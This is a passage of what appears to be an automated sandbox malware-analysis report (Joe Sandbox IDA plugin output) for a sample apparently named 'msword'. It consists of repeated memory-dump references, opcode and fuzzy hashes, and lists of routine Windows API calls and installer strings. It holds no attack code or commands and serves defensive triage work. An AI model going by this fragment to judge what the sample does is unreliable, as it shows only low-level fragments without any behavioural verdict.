                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                    • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                    • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                    • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                    • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                    • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                    • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                    • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                    • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                    • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                    • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                    • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                    • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    APIs
                                                                    • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                    • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                    • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                    • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 3394109436-0
                                                                    APIs
                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesCreate
                                                                    • String ID:
                                                                    • API String ID: 415043291-0
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    APIs
                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                      • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                    • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Char$Next$CreateDirectoryPrev
                                                                    • String ID:
                                                                    • API String ID: 4115351271-0
                                                                    APIs
                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                    • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                                    • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                    • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                    • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                    • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                    • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                    APIs
                                                                    • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                    • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                                    • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                    • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                    • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                    • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                    • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                    • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                    • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                    • DeleteObject.GDI32(?), ref: 00404A79
                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                    • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                    • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                    • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                    • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                    • String ID: $ @$M$N
                                                                    • API String ID: 1638840714-3479655940
                                                                    • Opcode ID: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
                                                                    • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                    • Opcode Fuzzy Hash: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
                                                                    • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                    • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                    • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                    • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                    • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                    • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                    • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                    • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                      • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                      • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                      • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                    • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                    • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                    • String ID: 82D$@%F$@rD$A
                                                                    • API String ID: 3347642858-1086125096
                                                                    • Opcode ID: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                    • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                    • Opcode Fuzzy Hash: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                    • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                    • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                    • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                    • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                    • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                    • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                    • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                    • API String ID: 1916479912-1189179171
                                                                    • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                    • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                    • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                    • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                    • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                    • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                    • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                    • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                    • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                    • FindClose.KERNEL32(?), ref: 00406E33
                                                                    Strings
                                                                    • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                    • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                    • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                    • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                    • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                    • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                    • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                    • \*.*, xrefs: 00406D03
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                    • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                    Strings
                                                                    • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInstance
                                                                    • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindFirst
                                                                    • String ID:
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
